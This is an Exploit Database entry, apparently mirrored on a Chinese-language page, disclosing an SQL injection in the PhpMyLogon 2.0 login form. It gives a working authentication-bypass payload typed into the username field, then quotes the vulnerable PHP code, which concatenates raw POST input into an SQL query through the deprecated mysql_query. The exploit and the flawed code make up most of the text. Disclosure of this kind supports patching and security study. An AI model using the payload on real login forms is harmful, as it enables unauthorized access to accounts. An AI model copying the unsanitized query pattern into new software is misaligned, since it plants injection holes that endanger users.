PhpMyLogon 2.0 – SQL Injection

• Exploit Database
• 12 阅读

• 作者： blake
  日期： 2010-03-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11737/

• # Exploit Title: PhpMyLogon SQL Injection
  # Date: March 14, 2010
  # Author: Blake
  # Software Link: http://sourceforge.net/projects/phpmylogon/files/PhpMyLogon/PhpMyLogon%202/phpmylogon2.zip/download
  # Version: 2
  # Tested on: Windows XP SP3
  
  
  Proof of Concept:
  Enter the following for the username to login as the first user:
  blake'or '1'='1' #
  and anything for the password.
  
  Vulnerable Code:
  if(isset($_POST['submit'])) {
  if($_POST['username'] != "" AND $_POST['password'] != "") {
  // Check submitted data with data in database
  $sql = "SELECT id,username,password,cookie_pass,actcode,rank FROM `".$settings['db_table']."` WHERE username = '".$_POST['username']."' LIMIT 1";
  $query = mysql_query($sql);